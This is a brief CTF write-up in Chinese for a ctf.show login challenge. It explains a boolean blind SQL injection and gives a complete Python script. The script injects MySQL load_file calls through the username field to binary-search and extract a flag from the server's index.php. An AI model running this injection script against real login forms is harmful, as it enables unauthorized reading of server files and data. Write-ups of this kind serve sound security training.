和上道题目题目类似,但是数据库里存的内容改变了
    这里用0 0无法登录,会返回密码错误
    但是0 1||1 又被过滤了
    而用 1 1登录的时候会返回查询失败
    我们可以根据两个返回的不同的值来进行布尔盲注

    1. import requests
    3. url = "http://3c62eaac-7e52-44c0-8a45-ae24d2881a92.challenge.ctf.show/api/"
    4. payload1 = "if(locate('ctfshow',load_file('/var/www/html/api/index.php'))>{index},0,1)"
    5. payload2 = "if(ascii(substr(load_file('/var/www/html/api/index.php'),{},1))>{},0,1)"
    7. def find_flag_index():
    8.     head = 1
    9.     tail= 300
    10.     while head < tail:
    11.         mid = (head + tail) >> 1
    12.         data = {
    13.             "username": payload1.format(index=mid),
    14.             "password": '0'
    15.         }
    16.         response = requests.post(url, data=data)
    17.         if "密码错误" in response.json()['msg']:
    18.             head = mid +1
    19.         else:
    20.             tail = mid
    21.     print("[!]flag index",mid)
    22.     return mid
    24. def getFlag(num):
    25.     i = int(num)
    26.     flag = ""
    27.     while True:
    28.         head = 32
    29.         tail = 127
    30.         i = i + 1
    31.         while not (abs(head-tail) == 1 or head == tail):
    32.             mid = (head + tail) // 2
    33.             data = {
    34.                 "username": payload2.format(i,mid),
    35.                 "password": '0'
    36.             }
    37.             response = requests.post(url,data=data)
    38.             if "密码错误" in response.json()['msg']:
    39.                 head = mid
    40.             else:
    41.                 tail = mid
    42.         if tail < head:
    43.             tail = head
    44.         flag += chr(tail)
    45.         print("[!]flag:",flag)
    46.         if flag[-1] == "}":
    47.             break
    49. if __name__== "__main__":
    50.     Index = find_flag_index()
    51.     getFlag(Index)